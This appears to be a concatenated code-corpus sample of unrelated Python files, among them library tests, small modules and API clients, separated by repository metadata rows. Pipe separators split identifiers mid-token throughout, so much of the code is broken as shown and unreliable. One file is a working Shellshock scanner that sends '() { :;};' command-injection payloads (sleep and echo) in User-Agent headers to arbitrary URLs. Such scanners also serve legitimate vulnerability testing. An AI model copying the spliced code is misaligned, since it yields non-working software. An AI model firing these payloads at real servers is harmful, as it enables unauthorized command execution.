assert mock_connect.call_count == 1
assert mock_connect.call_args[0] == ()
assert mock_connect.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.close")
def test_close(self, mock_close):
s = bcs.ClientSession()
s.close()
assert mock_close.call_count == 1
assert mock_close.call_args[0] == ("closed",)
assert mock_close.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.close")
def test_context_manager(self, mock_close):
with bcs.ClientSession() as session:
assert isinstance(session, bcs.ClientSession)
assert mock_close.call_count == 1
assert mock_close.call_args[0] == ("closed",)
assert mock_close.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.close")
def test_close_with_why(self, mock_close):
s = bcs.ClientSession()
s.close("foo")
assert mock_close.call_count == 1
assert mock_close.call_args[0] == ("foo",)
assert mock_close.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.force_roundtrip")
def test_force_roundtrip(self, mock_force_roundtrip):
s = bcs.ClientSession()
s.force_roundtrip()
assert mock_force_roundtrip.call_count == 1
assert mock_force_roundtrip.call_args[0] == ()
assert mock_force_roundtrip.call_args[1] == {}
@patch("warnings.warn")
@patch("bokeh.client.connection.ClientConnection.loop_until_closed")
def test_loop_until_closed(self, mock_loop_until_closed, mock_warn):
s = bcs.ClientSession()
s.loop_until_closed()
assert mock_loop_until_closed.call_count == 1
assert mock_loop_until_closed.call_args[0] == ()
assert mock_loop_until_closed.call_args[1] == {}
assert mock_warn.call_count == 1
assert mock_warn.call_args[0] == (bcs._BOKEH_CLIENT_APP_WARNING_FULL,)
assert mock_warn.call_args[1] == {}
@patch("warnings.warn")
@patch("bokeh.client.connection.ClientConnection.loop_until_closed")
def test_loop_until_closed_suppress_warnings(self, mock_loop_until_closed, mock_warn):
s = bcs.ClientSession()
s.loop_until_closed(True)
assert mock_loop_until_closed.call_count == 1
assert mock_loop_until_closed.call_args[0] == ()
assert mock_loop_until_closed.call_args[1] == {}
assert mock_warn.call_count == 0
@patch("bokeh.client.connection.ClientConnection.request_server_info")
def test_request_server_info(self, mock_request_server_info):
s = bcs.ClientSession()
s.request_server_info()
assert mock_request_server_info.call_count == 1
assert mock_request_server_info.call_args[0] == ()
assert mock_request_server_info.call_args[1] == {}
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
skapfer/rubber | src/latex_modules/dvips.py | Python | gpl-2.0 | 278 | 0.010791 | # This file is part of Rubber and thus covere | d by the GPL
import rubber.dvip_tool
import rubber.module_interface
class Module (rubber.module_interface.Modu | le):
def __init__ (self, document, opt):
self.dep = rubber.dvip_tool.Dvip_Tool_Dep_Node (document, 'dvips')
|
bsmr-eve/Pyfa | eos/effects/remotetargetpaintentity.py | Python | gpl-3.0 | 366 | 0.002732 | # remoteTargetPaintEntity
#
# U | sed by:
# Drones named like: TP (3 of 3)
type = "projected", "active"
def handler(fit, container, context, *args, **kwargs):
if "projected" | in context:
fit.ship.boostItemAttr("signatureRadius", container.getModifiedItemAttr("signatureRadiusBonus"),
stackingPenalties=True, *args, **kwargs)
|
mosajjal/mitmproxy | test/mitmproxy/addons/test_stickycookie.py | Python | mit | 4,831 | 0.000828 | import pytest
from mitmproxy.test import tflow
from mitmproxy.test import taddons
from mitmproxy.addons impor | t stickycookie
from mitmproxy.test import tutils as ntutils
def test_domain_match():
assert stickycookie.domain_match("www.google.com", ".google.com")
| assert stickycookie.domain_match("google.com", ".google.com")
class TestStickyCookie:
def test_config(self):
sc = stickycookie.StickyCookie()
with taddons.context() as tctx:
with pytest.raises(Exception, match="invalid filter"):
tctx.configure(sc, stickycookie="~b")
tctx.configure(sc, stickycookie="foo")
assert sc.flt
tctx.configure(sc, stickycookie=None)
assert not sc.flt
def test_simple(self):
sc = stickycookie.StickyCookie()
with taddons.context() as tctx:
tctx.configure(sc, stickycookie=".*")
f = tflow.tflow(resp=True)
f.response.headers["set-cookie"] = "foo=bar"
sc.request(f)
f.reply.acked = False
sc.response(f)
assert sc.jar
assert "cookie" not in f.request.headers
f = f.copy()
sc.request(f)
assert f.request.headers["cookie"] == "foo=bar"
def _response(self, sc, cookie, host):
f = tflow.tflow(req=ntutils.treq(host=host, port=80), resp=True)
f.response.headers["Set-Cookie"] = cookie
sc.response(f)
return f
def test_response(self):
sc = stickycookie.StickyCookie()
with taddons.context() as tctx:
tctx.configure(sc, stickycookie=".*")
c = "SSID=mooo; domain=.google.com, FOO=bar; Domain=.google.com; Path=/; " \
"Expires=Wed, 13-Jan-2021 22:23:01 GMT; Secure; "
self._response(sc, c, "host")
assert not sc.jar.keys()
self._response(sc, c, "www.google.com")
assert sc.jar.keys()
sc.jar.clear()
self._response(sc, "SSID=mooo", "www.google.com")
assert list(sc.jar.keys())[0] == ('www.google.com', 80, '/')
def test_response_multiple(self):
sc = stickycookie.StickyCookie()
with taddons.context() as tctx:
tctx.configure(sc, stickycookie=".*")
# Test setting of multiple cookies
c1 = "somecookie=test; Path=/"
c2 = "othercookie=helloworld; Path=/"
f = self._response(sc, c1, "www.google.com")
f.response.headers["Set-Cookie"] = c2
sc.response(f)
googlekey = list(sc.jar.keys())[0]
assert len(sc.jar[googlekey].keys()) == 2
def test_response_weird(self):
sc = stickycookie.StickyCookie()
with taddons.context() as tctx:
tctx.configure(sc, stickycookie=".*")
# Test setting of weird cookie keys
f = tflow.tflow(req=ntutils.treq(host="www.google.com", port=80), resp=True)
cs = [
"foo/bar=hello",
"foo:bar=world",
"foo@bar=fizz",
]
for c in cs:
f.response.headers["Set-Cookie"] = c
sc.response(f)
googlekey = list(sc.jar.keys())[0]
assert len(sc.jar[googlekey].keys()) == len(cs)
def test_response_overwrite(self):
sc = stickycookie.StickyCookie()
with taddons.context() as tctx:
tctx.configure(sc, stickycookie=".*")
# Test overwriting of a cookie value
c1 = "somecookie=helloworld; Path=/"
c2 = "somecookie=newvalue; Path=/"
f = self._response(sc, c1, "www.google.com")
f.response.headers["Set-Cookie"] = c2
sc.response(f)
googlekey = list(sc.jar.keys())[0]
assert len(sc.jar[googlekey].keys()) == 1
assert list(sc.jar[googlekey]["somecookie"].items())[0][1] == "newvalue"
def test_response_delete(self):
sc = stickycookie.StickyCookie()
with taddons.context() as tctx:
tctx.configure(sc, stickycookie=".*")
# Test that a cookie is be deleted
# by setting the expire time in the past
f = self._response(sc, "duffer=zafar; Path=/", "www.google.com")
f.response.headers["Set-Cookie"] = "duffer=; Expires=Thu, 01-Jan-1970 00:00:00 GMT"
sc.response(f)
assert not sc.jar.keys()
def test_request(self):
sc = stickycookie.StickyCookie()
with taddons.context() as tctx:
tctx.configure(sc, stickycookie=".*")
f = self._response(sc, "SSID=mooo", "www.google.com")
assert "cookie" not in f.request.headers
sc.request(f)
assert "cookie" in f.request.headers
|
SleepProgger/another_shellshock_test | shellshock_cgi.py | Python | gpl-2.0 | 2,092 | 0.00956 | #!/usr/bin/env python
import urllib2
import time
import random
import string
randstr = lambda n: ''.join(random.choice(string.ascii_letters + string.digits) for i in xrange(n))
def timing_attack(url, request_type="HEAD", data=None, headers=None, sleeptime = 3, cmd='() { :;}; PATH="/bin:/usr/bin:/usr/local/bin:$PATH" sleep %f'):
request_type = request_type.upper()
if request_type not in ("HEAD", "GET", "POST"):
raise Exception("Illegal request type '%s'" % request_type)
if headers is None: headers = {}
r = urllib2.Request(url, data, headers)
r.get_method = lambda : request_type
otime = -time.time()
response = urllib2.urlopen(r)
otime += time.time()
# somehow add_header doesn't work for user-agent and py2.7
r.add_unredirected_header("User-Agent", cmd % (sleeptime,))
h | time = -time.time()
response = u | rllib2.urlopen(r)
htime += time.time()
return htime >= sleeptime and htime > otime
def text_attack(url, request_type="GET", data=None, headers=None):
request_type = request_type.upper()
if request_type not in ("GET", "POST"):
raise Exception("Illegal request type '%s'" % request_type)
if headers is None: headers = {}
needle = randstr(20)
r = urllib2.Request(url, data, headers)
r.add_unredirected_header("User-Agent", '() { :;}; echo \'%s\'' % (needle,))
r.add_header("User-Agent", '() { :;}; echo \'%s\'' % (needle,))
r.get_method = lambda : request_type
response = urllib2.urlopen(r)
return needle in response.read()
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
urls = sys.stdin.readlines()
else:
urls = sys.argv[1:]
for url in urls:
print "- testing:", url
try:
print "Timing attack vulnerable:",
print timing_attack(url, "GET")
print "Known text attack vulnerable:",
print text_attack(url, "GET")
print
except urllib2.HTTPError as he:
print "Request error:", he
|
jazzmes/pyroute2 | examples/ipdb_routes.py | Python | gpl-2.0 | 503 | 0 | from pyroute2 impo | rt IPDB
ip = IPDB()
# create dummy interface to host routes on
ip.create(kind='dummy', ifname='pr2test').\
add_ip('172.16.1.1/24').\
up().\
commit()
# create a route
with ip.routes.add({'dst': '172.16.0.0/24',
'gateway': '172.16.1.2'}) as r:
pass
# modify it
with ip.routes['172.16.0.0/24'] as r:
r.gateway = '172.16.1.3'
# cleanup
with ip.routes['172.16.0.0/24'] as r:
r.remove()
ip.interfaces.pr2test.remov | e().commit()
ip.release()
|
edisonlz/fruit | web_project/base/youkuapi/show.py | Python | apache-2.0 | 2,122 | 0.005666 | #coding=utf-8
from base import BaseApi
import settings
class ShowApi(BaseApi):
"""
节目API
"""
FD = ['showid', 'pk_odshow', 'showname', 'showsubtitle', 'deschead', 'showdesc', 'show_thumburl', 'show_vthumburl',
'show_bannerurl', 'showlength', 'copyright_status', 'paid', 'pay_type', ' | onlinetime', 'hasvideotype',
'firstepisode_videoid', 'firstepisode_videotitle', 'firstepisode_videorctitle', 'firstepisode_thumburl',
'firstepisode_thumburl_v2', 'lastepisode_videoid', 'lastepisode_videotitle', 'lastepisode_videorctitle',
'lastepisode_ | thumburl', 'lastepisode_thumburl', 'showtotal_vv', 'device_disabled', 'trailer_videoid',
'episode_last', 'episode_total']
fd = ' '.join(FD)
HOST = settings.SHOW_HOST
FORMAT = "json"
@classmethod
def get_show_info(cls, show_id, fd=None, **kwargs):
"""
:param str show_id: youku video id
:param str fd: field description default cls.fd
:param dict kwargs: params
:raises ValueError: if the show_id is None
:return wiki: http://wiki.1verge.net/webdev:ds:show
get video info api code sample::
ShowApi.get_show_info("xasdtmmdx12")
"""
if not fd:
fd = cls.fd
path='/show'
q = {}
q.update({'showid': show_id})
q.update(kwargs)
q_str = ' '.join(["{k}:{v}".format(k=k, v=v) for k, v in q.iteritems()])
params = {"ft": cls.FORMAT, "q": q_str, "fd": fd}
headers = {'X-Forwarded-For': kwargs.get("ip")}
info = cls.get_json(cls.HOST, path, params, headers)
try:
if info.get('results') is False:
return {}
else:
return info.get('results', [{}, ])[0]
except TypeError:
print 'fetch error'
print info
if __name__ == '__main__':
print ShowApi.get_show_info('f108ae9e270811e2b356')
ret = ShowApi.get_show_info('188d6318525711e3b8b7')
import json
print json.dumps(ret, ensure_ascii=False, sort_keys=True, indent=4)
|
huan/Underscore | examples/class_method.py | Python | mit | 84 | 0.02381 | class Foo(o | bject):
def run(self):
return 3
print(Foo().run( | ))
|
bobsummerwill/solidity | scripts/fix_homebrew_paths_in_standalone_zip.py | Python | gpl-3.0 | 2,861 | 0.001049 | # ------------------------------------------------------------------------------
# This Python script is used within the OS X release process, to ensure
# that the standalone OS X ZIP files which we make are actually
# standalone, and not implicitly dependent on Homebrew installs for
# external libraries which we use.
#
# This implicit dependencies seem to show up only where we have
# external dependencies which are dependent on each other, and the
# path from one to another is an absolute path to "/usr/local/opt",
# the Homebrew install location. External dependencies which only
# depend on system libraries are fine. Our main applications seem
# to be fine.
#
# An example of a dependency which requires this fix-up at the time
# of writing is the following dependency edge:
#
# libjsonrpccpp-client.0.dylib
# -> /usr/local/opt/jsoncpp/lib/libjsoncpp.0.dylib
#
# See https://blogs.oracle.com/dipol/entry/dynamic_libraries_rpath_and_mac
# for a little overview of "install_name_tool" and "otool".
#
# ------------------------------------------------------------------------------
# This file is part of solidity.
#
# solidity is free software: you can redistribute it and/or modify
# it | under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# solidity is distributed in the | hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with solidity. If not, see <http://www.gnu.org/licenses/>
#
# (c) 2016 solidity contributors.
# -----------------------------------------------------------------------------
import os
import subprocess
import sys
def readDependencies(fname):
with open(fname) as f:
o = subprocess.Popen(['otool', '-L', fname], stdout=subprocess.PIPE)
for line in o.stdout:
if line[0] == '\t':
library = line.split(' ', 1)[0][1:]
if library.startswith("/usr/local/lib") or library.startswith("/usr/local/opt") or library.startswith("/Users/"):
if (os.path.basename(library) != os.path.basename(fname)):
command = "install_name_tool -change " + \
library + " @executable_path/./" + \
os.path.basename(library) + " " + fname
print(command)
os.system("chmod +w " + fname)
os.system(command)
root = sys.argv[1]
for (dirpath, dirnames, filenames) in os.walk(root):
for filename in filenames:
readDependencies(os.path.join(root, filename))
|
MarioVilas/secondlife-experiments | SimProxy/udpfilter/FollowTeleports.py | Python | gpl-2.0 | 1,706 | 0.010551 | from PacketFilterBase import *
class FollowTeleportsFilter(PacketFilterBase):
def __newSim(self, packet, info_key, ip_key, port_key):
decodedData = packet.getDecodedData()
circuit_info = decodedData[info_key]
| sim_ip = circuit_info[ip_key]
sim_port = circuit_info[port_key]
new_ip, new_port = self.proxy.newSim( (sim_ip, sim_port) )
circuit_info[ip_key] = new_ip
| circuit_info[port_key] = new_port
packet.setDecodedData(decodedData)
return packet
def OpenCircuit(self, fromViewer, packet):
if not fromViewer:
packet = self.__newSim(packet, 'CircuitInfo', 'IP', 'Port')
return False, packet
def CrossedRegion(self, fromViewer, packet):
if not fromViewer:
packet = self.__newSim(packet, 'RegionData', 'SimIP', 'SimPort')
return False, packet
def EnableSimulator(self, fromViewer, packet):
if not fromViewer:
packet = self.__newSim(packet, 'SimulatorInfo', 'IP', 'Port')
return False, packet
def TeleportFinish(self, fromViewer, packet):
if not fromViewer:
packet = self.__newSim(packet, 'Info', 'SimIP', 'SimPort')
return False, packet
## def TeleportProgress(self, fromViewer, packet):
## if not fromViewer:
## message = 'All your base are belong to us\x00'
## decodedData = packet.getDecodedData()
## decodedData['Info']['Message'] = message
## packet.setDecodedData(decodedData)
## return False, packet
|
tiborsimko/invenio-records-rest | invenio_records_rest/serializers/response.py | Python | mit | 2,527 | 0 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Serialization response factories.
Responsible for creating a HTTP response given the output of a serializer.
"""
from __future__ import absolute_import, print_function
from flask import current_app
def record_responsify(serializer, mimetype):
"""Create a Records-REST response serializer.
:param serializer: Serializer instance.
:param mimetype: MIME type of response.
:returns: Function that generates a record HTTP response.
"""
def view(pid, record, code=200, headers=None, links_factory=None):
response = current_app.response_class(
serializer.serialize(pid, record, links_factory=links_factory),
mimetype=mimetype)
response.status_code = code
response.set_etag(str(record.revision_id))
response.last_modified = record.updated
if headers is not None:
response.headers.extend(headers)
if links_factory is not None:
add_link_header(response, links_factory(pid))
return response
return view
def | search_responsify(serializer, mimetype):
"""Create a Records-REST search result response serializer | .
:param serializer: Serializer instance.
:param mimetype: MIME type of response.
:returns: Function that generates a record HTTP response.
"""
def view(pid_fetcher, search_result, code=200, headers=None, links=None,
item_links_factory=None):
response = current_app.response_class(
serializer.serialize_search(pid_fetcher, search_result,
links=links,
item_links_factory=item_links_factory),
mimetype=mimetype)
response.status_code = code
if headers is not None:
response.headers.extend(headers)
if links is not None:
add_link_header(response, links)
return response
return view
def add_link_header(response, links):
"""Add a Link HTTP header to a REST response.
:param response: REST response instance
:param links: Dictionary of links
"""
if links is not None:
response.headers.extend({
'Link': ', '.join([
'<{0}>; rel="{1}"'.format(l, r) for r, l in links.items()])
})
|
dongjoon-hyun/tensorflow | tensorflow/python/autograph/core/errors_test.py | Python | apache-2.0 | 3,793 | 0.006591 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for errors module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.autograph.core import errors
from tensorflow.python.autograph.pyct import origin_info
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors as tf_errors
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.util import tf_inspect
def zero_div():
x = array_ops.constant(10, dtype=dtypes.int32)
return x // 0
def zero_div_caller():
return zero_div()
class RuntimeErrorsTest(test.TestCase):
def fake_origin(self, function, line_offset):
_, lineno = tf_inspect.getsourcelines(function)
filename = tf_inspect.getsourcefile(function)
lineno += line_offset
loc = origin_info.LineLocation(filename, lineno)
origin = origin_info.OriginInfo(loc, 'test_function_name', 'test_code',
'test_comment')
return loc, origin
def test_improved_errors_basic(self):
loc, origin = self.fake_origin(zero_div, 2)
zero_div_caller.ag_source_map = {loc: origin}
ops = zero_div_caller()
with self.assertRaises(errors.TfRuntimeError) as cm:
with errors.improved_errors(zero_div_caller):
with self.cached_session() as sess:
sess.run(ops)
for fr | ame in cm.exception.custom_traceback:
_, _, function_name, _ = frame
self.assertNotEqual('zero_div', function_name)
self.assertIn(origin.as_frame(), set(cm.exception.custom_traceback))
def test_improved_errors_no_matching_lineno(self):
loc, origin = self.fake_origin(zero_div, -1)
zero_div_caller.ag_source_map = {loc: origin}
ops = zero_div_caller()
with self.assertRaises(errors.TfRuntimeError) as cm:
with errors.improved_errors(zero_div_caller) | :
with self.cached_session() as sess:
sess.run(ops)
all_function_names = set()
for frame in cm.exception.custom_traceback:
_, _, function_name, _ = frame
all_function_names.add(function_name)
self.assertNotEqual('test_function_name', function_name)
self.assertIn('zero_div', all_function_names)
def test_improved_errors_failures(self):
loc, _ = self.fake_origin(zero_div, 2)
zero_div_caller.ag_source_map = {loc: 'bogus object'}
ops = zero_div_caller()
with self.assertRaises(tf_errors.InvalidArgumentError):
with errors.improved_errors(zero_div_caller):
with self.cached_session() as sess:
sess.run(ops)
def test_improved_errors_validation(self):
with self.assertRaisesRegexp(
ValueError,
'converted_function must be the result of an autograph.to_graph call'):
errors.improved_errors(zero_div).__enter__()
with self.assertRaisesRegexp(
ValueError,
'converted_function must be the result of an autograph.to_graph call'):
zero_div_caller.ag_source_map = 'not a dict'
errors.improved_errors(zero_div_caller).__enter__()
if __name__ == '__main__':
test.main()
|
zhangjiajie/tax_benchmark | script/ete2/clustering/__init__.py | Python | gpl-3.0 | 1,549 | 0.008393 | __VERS | ION__="ete2-2.2rev1026"
# -*- coding: utf-8 -*-
# #START_LICENSE###########################################################
#
#
# This file is part of the Environment for Tree Exploration pro | gram
# (ETE). http://ete.cgenomics.org
#
# ETE is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ETE is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ETE. If not, see <http://www.gnu.org/licenses/>.
#
#
# ABOUT THE ETE PACKAGE
# =====================
#
# ETE is distributed under the GPL copyleft license (2008-2011).
#
# If you make use of ETE in published work, please cite:
#
# Jaime Huerta-Cepas, Joaquin Dopazo and Toni Gabaldon.
# ETE: a python Environment for Tree Exploration. Jaime BMC
# Bioinformatics 2010,:24doi:10.1186/1471-2105-11-24
#
# Note that extra references to the specific methods implemented in
# the toolkit are available in the documentation.
#
# More info at http://ete.cgenomics.org
#
#
# #END_LICENSE#############################################################
from clustertree import *
__all__ = clustertree.__all__
|
alexa-infra/negine | thirdparty/boost-python/libs/python/pyste/src/Pyste/EnumExporter.py | Python | mit | 2,214 | 0.006323 | # Copyright Bruno da Silva de Oliveira 2003. Use, modification and
# distribution is subject to the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
from Exporter import Exporter
from settings import *
import utils
#==============================================================================
# EnumExporter
#==============================================================================
class EnumExporter(Exporter):
'Exports enumerators'
def __init__(self, info):
Exporter.__init__(self, info)
def SetDeclarations(self, declarations):
Exporter.SetDeclarations(self, declarations)
if self.declarations:
self.enum = self.GetDeclaration(self.info.name)
else:
self.enum = None
def Export(self, codeunit, exported_names):
if self.info.exclude:
return
indent = self.INDENT
in_indent = self.INDENT*2
rename = self.info.rename or self.enum.name
full_name = self.enum.FullName()
unnamed_enum = False
if rename.startswith('$_') or rename.startswit | h('._'):
unnamed_enum = True
code = ''
if not unnamed_enum:
code += indent + namespaces.python
code += 'enum_< %s >("%s")\n' % (full_nam | e, rename)
for name in self.enum.values:
rename = self.info[name].rename or name
value_fullname = self.enum.ValueFullName(name)
if not unnamed_enum:
code += in_indent + '.value("%s", %s)\n' % (rename, value_fullname)
else:
code += indent + namespaces.python
code += 'scope().attr("%s") = (int)%s;\n' % (rename, value_fullname )
if self.info.export_values and not unnamed_enum:
code += in_indent + '.export_values()\n'
if not unnamed_enum:
code += indent + ';\n'
code += '\n'
codeunit.Write('module', code)
exported_names[self.enum.FullName()] = 1
def Name(self):
return self.info.name
|
atsuyim/OpenBazaar | tests/test_transport.py | Python | mit | 2,556 | 0.002347 | import unittest
from node.openbazaar_daemon import OpenBazaarContext
import mock
from node import transport
def get_mock_open_bazaar_context():
return OpenBazaarContext.create_default_instance()
class TestTransportLayerCallbacks(unittest.TestCase):
"""Test the callback features of the TransportLayer class."""
def setUp(self):
# For testing sections
self.callback1 = mock.Mock()
self.callback2 = mock.Mock()
self.callback3 = mock.Mock()
self.validator1 = mock.Mock()
self.validator2 = mock.Mock()
self.validator3 = mock.Mock()
ob_ctx = get_mock_open_bazaar_context()
ob_ctx.nat_status = {'nat_type': 'Restric NAT'}
guid = 1
nickname = None
self.transport_layer = transport.TransportLayer(ob_ctx, guid, nickname)
self.transport_layer.add_callback('section_one', {'cb': self.callback1, 'validator_cb': self.validator1})
self.transport_layer.add_callback('section_one', {'cb': self.callback2, 'validator_cb': self.validator2})
self.transport_layer.add_callback('all', {'cb': self.callback3, 'validator_cb': self.validator3})
# For testing validators
| self.callback4 = mock.Mock()
self.callback5 = mock.Mock()
self.validator4 = mock.Mock(return_value=True)
self.validator5 = mock.Mock(return_value=False)
self.transport_layer.add_callback('section_two', {'cb': self.callb | ack4, 'validator_cb': self.validator4})
self.transport_layer.add_callback('section_two', {'cb': self.callback5, 'validator_cb': self.validator5})
def _assert_called(self, one, two, three):
self.assertEqual(self.callback1.call_count, one)
self.assertEqual(self.callback2.call_count, two)
self.assertEqual(self.callback3.call_count, three)
def test_fixture(self):
self._assert_called(0, 0, 0)
def test_callbacks(self):
self.transport_layer.trigger_callbacks('section_one', None)
self._assert_called(1, 1, 1)
def test_all_callback(self):
self.transport_layer.trigger_callbacks('section_with_no_register', None)
self._assert_called(0, 0, 1)
def test_validators(self):
self.transport_layer.trigger_callbacks('section_two', None)
self.assertEqual(self.validator4.call_count, 1)
self.assertEqual(self.validator5.call_count, 1)
self.assertEqual(self.callback4.call_count, 1)
self.assertEqual(self.callback5.call_count, 0)
if __name__ == "__main__":
unittest.main()
|
NovaPointGroup/purchase-workflow | purchase_all_shipments/__openerp__.py | Python | agpl-3.0 | 978 | 0 | # Author: Leonardo Pistone
# Copyright 2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Fre | e Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# | GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
{'name': 'Purchase All Shipments',
'version': '1.0',
'author': "Camptocamp,Odoo Community Association (OCA)",
'category': 'Purchases',
'license': 'AGPL-3',
'depends': ['purchase'],
'data': ['view/purchase_order.xml'],
}
|
googleapis/python-dlp | samples/snippets/redact_test.py | Python | apache-2.0 | 1,601 | 0.000625 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# | http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in w | riting, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import tempfile
import pytest
import redact
GCLOUD_PROJECT = os.getenv("GOOGLE_CLOUD_PROJECT")
RESOURCE_DIRECTORY = os.path.join(os.path.dirname(__file__), "resources")
@pytest.fixture(scope="module")
def tempdir():
tempdir = tempfile.mkdtemp()
yield tempdir
shutil.rmtree(tempdir)
def test_redact_image_file(tempdir, capsys):
test_filepath = os.path.join(RESOURCE_DIRECTORY, "test.png")
output_filepath = os.path.join(tempdir, "redacted.png")
redact.redact_image(
GCLOUD_PROJECT, test_filepath, output_filepath, ["FIRST_NAME", "EMAIL_ADDRESS"],
)
out, _ = capsys.readouterr()
assert output_filepath in out
def test_redact_image_all_text(tempdir, capsys):
test_filepath = os.path.join(RESOURCE_DIRECTORY, "test.png")
output_filepath = os.path.join(tempdir, "redacted.png")
redact.redact_image_all_text(
GCLOUD_PROJECT, test_filepath, output_filepath,
)
out, _ = capsys.readouterr()
assert output_filepath in out
|
radio-astro-tools/spectral-cube | spectral_cube/tests/test_casafuncs.py | Python | bsd-3-clause | 9,896 | 0.003133 | from __future__ import print_function, absolute_import, division
import os
import shutil
from itertools import product
import pytest
import numpy as np
from numpy.testing import assert_allclose
from astropy.tests.helper import assert_quantity_allclose
from astropy import units as u
from casa_formats_io import coordsys_to_astropy_wcs
from ..io.casa_masks import make_casa_mask
from .. import StokesSpectralCube, BooleanArrayMask
from .. import SpectralCube, VaryingResolutionSpectralCube
try:
import casatools
from casatools import image
CASA_INSTALLED = True
except ImportError:
try:
from taskinit import ia as image
CASA_INSTALLED = True
except ImportError:
CASA_INSTALLED = False
DATA = os.path.join(os.path.dirname(__file__), 'data')
def make_casa_testimage(infile, outname):
infile = str(infile)
outname = str(outname)
if not CASA_INSTALLED:
raise Exception("Attempted to make a CASA test image in a non-CASA "
"environment")
ia = image()
ia.fromfits(infile=infile, outfile=outname, overwrite=True)
ia.unlock()
ia.close()
ia.done()
cube = SpectralCube.read(infile)
if isinstance(cube, VaryingResolutionSpectralCube):
ia.open(outname)
# populate restoring beam emptily
ia.setrestoringbeam(major={'value':1.0, 'unit':'arcsec'},
minor={'value':1.0, 'unit':'arcsec'},
pa={'value':90.0, 'unit':'deg'},
channel=len(cube.beams)-1,
polarization=-1,
)
# populate each beam (hard assumption of 1 poln)
for channum, beam in enumerate(cube.beams):
casabdict = {'major': {'value':beam.major.to(u.deg).value, 'unit':'deg'},
'minor': {'value':beam.minor.to(u.deg).value, 'unit':'deg'},
'positionangle': {'value':beam.pa.to(u.deg).value, 'unit':'deg'}
}
ia.setrestoringbeam(beam=casabdict, channel=channum, polarization=0)
ia.unlock()
ia.close()
ia.done()
@pytest.fixture
def filename(request):
return request.getfixturevalue(request.param)
@pytest.mark.parametrize(('memmap', 'bigendian'), product((False, True), (False, True)))
def test_casa_read_basic(memmap, bigendian):
# Check that SpectralCube.read works for an example CASA dataset stored
# in the tests directory. This test should NOT require CASA, whereas a
# number of tests below require CASA to generate test datasets. The present
# test is to ensure CASA is not required for reading.
if bigendian:
cube = SpectralCube.read(os.path.join(DATA, 'basic_bigendian.image'), memmap=memmap)
else:
cube = SpectralCube.read(os.path.join(DATA, 'basic.image'), memmap=memmap)
assert cube.shape == (3, 4, 5)
assert_allclose(cube.wcs.pixel_to_world_values(1, 2, 3),
[2.406271e+01, 2.993521e+01, 1.421911e+09])
# Carry out an operation to make sure the underlying data array works
cube.moment0()
# Slice the dataset
assert_quantity_allclose(cube.unmasked_data[0, 0, :],
[1, 1, 1, 1, 1] * u.Jy / u.beam)
assert_quantity_allclose(cube.unmasked_data[0, 1, 2], 1 * u.Jy / u.beam)
def test_casa_read_basic_nodask():
# For CASA datasets, the default when reading cubes is use_dask=True.
# Here we check that setting use_dask=False explicitly raises an error.
with pytest.raises(ValueError, match='Loading CASA datasets is not possible with use_dask=False'):
SpectralCube.read(os.path.join(DATA, 'basic.image'), use_dask=False)
def test_casa_read_basic_nomask():
# Make sure things work well if there is no mask in the data
cube = SpectralCube.read(os.path.join(DATA, 'nomask.image'))
assert cube.shape == (3, 4, 5)
assert_allclose(cube.wcs.pixel_to_world_values(1, 2, 3),
[2.406271e+01, 2.993521e+01, 1.421911e+09])
# Carry out an operation to make sure the underlying data array works
cube.moment0()
# Slice the dataset
assert_quantity_allclose(cube.unmasked_data[0, 0, :],
[1, 1, 1, 1, 1] * u.Jy / u.beam)
assert_quantity_allclose(cube.unmasked_data[0, 1, 2], 1 * u. | Jy / u.beam)
# Slice the cube
assert_quantity_allclose(cube[:, 0, 0],
